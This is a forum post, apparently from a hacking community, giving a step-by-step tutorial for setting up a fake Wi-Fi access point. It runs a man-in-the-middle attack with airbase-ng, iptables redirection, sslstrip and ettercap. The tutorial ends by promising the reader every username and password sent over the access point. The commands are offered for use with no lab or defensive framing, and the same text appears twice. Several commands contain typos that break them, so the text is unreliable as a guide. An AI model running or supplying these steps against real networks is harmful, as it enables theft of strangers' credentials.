Search
Latest topics
Who is online?
In total there are 7 users online :: 0 Registered, 0 Hidden and 7 Guests None
Most users ever online was 38 on Sun Mar 19, 2023 10:07 pm
Most Viewed Topics
Rogue AP MiTM Attack (Fake AP)
Page 1 of 1
Rogue AP MiTM Attack (Fake AP)
Introduction
That's what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack .
basicaly a Rogue Ap is a fake Ap which you can use to do MiTM attacks. if you don't know what those ar -> [You must be registered and logged in to see this link.]
This method uses a dhcp server. There are other methods which I will cover in another tutorial.
So let's start.
What do you need?
1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. one of them must support both, monitor and master mode
What do you need to do?
Configure the DHCP Server
1. Open terminal
2. route -n (note Gateway I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the dhcp3 server)
4. nano /etc/dhcpd.conf (configure the dhcp serv)
5. type or paste the following into your .conf
authorative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called"
option domain-name-servers 192.168.1.1;
ranger 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)
Start the AP
1. airmon-ng (check Net.Adap. will asume it's wlan0)
2. airmon-ng start wlan0 (start the mon mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL
Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 </procs/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptabels --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000
Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start
Starting SSL Strip
1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL
Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)
Congrats! If you have't run into any errors you should be able to get all user/pass that are beeing sent over the AP.
That's what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack .
basicaly a Rogue Ap is a fake Ap which you can use to do MiTM attacks. if you don't know what those ar -> [You must be registered and logged in to see this link.]
This method uses a dhcp server. There are other methods which I will cover in another tutorial.
So let's start.
What do you need?
1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. one of them must support both, monitor and master mode
What do you need to do?
Configure the DHCP Server
1. Open terminal
2. route -n (note Gateway I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the dhcp3 server)
4. nano /etc/dhcpd.conf (configure the dhcp serv)
5. type or paste the following into your .conf
authorative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called"
option domain-name-servers 192.168.1.1;
ranger 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)
Start the AP
1. airmon-ng (check Net.Adap. will asume it's wlan0)
2. airmon-ng start wlan0 (start the mon mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL
Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 </procs/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptabels --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000
Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start
Starting SSL Strip
1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL
Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)
Congrats! If you have't run into any errors you should be able to get all user/pass that are beeing sent over the AP.
kyle5647- Member
- Posts : 40
Join date : 2014-04-08
Similar topics
» [Tut] How to Create a Fake Access Point and Mess with People. NOOB FRIENDLY
» [iOS TUT] How to hack Clash of Clans (Stay Online, Loot Search and Simulate attack)
» [iOS TUT] How to hack Clash of Clans (Stay Online, Loot Search and Simulate attack)
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
Tue Feb 02, 2021 7:12 am by manas41
» SQL injection and Quote escaping
Sun Jun 28, 2015 11:42 am by ADS1
» [TUT] Chmod: Files & Permissions [TUT]
Thu Jun 04, 2015 12:45 pm by Guest
» Reaver pixiewps
Thu Jun 04, 2015 12:23 pm by voidfletcher
» How To Crash Someone's Skype in 10 SECONDS
Thu Jun 04, 2015 12:20 pm by voidfletcher
» Internet Security & IP Security (IPSec)
Mon May 18, 2015 9:00 pm by voidfletcher
» [Python] Infinite / Definite File Generator
Mon May 18, 2015 8:58 pm by ADS1
» [C#] String Case-Inversion
Mon May 18, 2015 8:57 pm by ADS1
» Rekall Memory Forensic Framework
Sat May 16, 2015 8:55 pm by ADS1